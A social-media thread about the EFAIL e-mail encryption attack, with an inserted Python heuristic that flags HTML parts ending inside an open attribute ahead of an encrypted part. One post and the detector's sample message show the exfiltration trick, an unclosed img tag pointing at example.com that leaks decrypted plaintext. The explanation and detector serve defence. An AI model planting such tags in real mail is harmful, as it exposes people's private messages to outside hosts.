rixx 🏴 @rixx

Ah, they've published their paper, but the tl;dr seems to be: Don't use HTML mails. If you receive an encrypted HTML mail, don't load external resources. It's a nice attack, sure, but not trusting HTML mails in the first place is hardly a novel concept. Details: efail.de/


@rixx
Yes, it appears that PGP (GPG) is NOT BROKEN per se, or at least not in a concerning way (the second attack worries me a bit more as it might allow forging the content, but that should be already mitigated by signature checking).

As usual, do not enable HTML nor auto-fetching of images. The attacks work by prepending an open-ended

<img src="example.com/

tag to the e-mail body. example.com is then able to retrieve the whole plain-text when the image URL is fetched.

#efail
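Added example, not part of the post above: a mail-filter heuristic in Python that flags the structure the post describes, an HTML part that stops inside an open quoted attribute and is followed by an encrypted part. The sample message, its placeholder armor body and all function names are constructed for illustration; the S/MIME content types and the inline-armor check are assumptions about what counts as an encrypted part.

```python
import email
from email import policy

# Constructed sample: an HTML part ending inside an open src="..." value,
# followed by an OpenPGP part. The armor body is a placeholder, not ciphertext.
SAMPLE = '''Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://example.com/
--B
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----
PLACEHOLDER
-----END PGP MESSAGE-----
--B--
'''

ENCRYPTED_TYPES = {"application/pgp-encrypted", "application/pkcs7-mime",
                   "application/x-pkcs7-mime"}

def ends_inside_quote(html):
    """True if the fragment stops inside a quoted attribute value (heuristic)."""
    in_tag, quote = False, None
    for ch in html:
        if quote:
            quote = None if ch == quote else quote
        elif in_tag and ch in "\"'":
            quote = ch
        elif in_tag and ch == ">":
            in_tag = False
        elif ch == "<":
            in_tag = True
    return quote is not None

def is_encrypted(part):
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return (part.get_content_maintype() == "text"
            and "-----BEGIN PGP MESSAGE-----" in part.get_content())

def suspicious_html_parts(raw):
    """Indexes of HTML leaf parts that end mid-attribute before an encrypted part."""
    msg = email.message_from_string(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    return [i for i, p in enumerate(leaves)
            if p.get_content_type() == "text/html"
            and ends_inside_quote(p.get_content())
            and any(is_encrypted(q) for q in leaves[i + 1:])]

if __name__ == "__main__":
    print(suspicious_html_parts(SAMPLE))
```

The scanner is a character-level heuristic, so a stray "<" followed by an apostrophe in ordinary text can produce a false positive; treat a hit as a reason to render the message as plain text, not as proof.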

@rixx @jd

However, many organisations push you into accepting them. Not being able to view newsletters, for instance.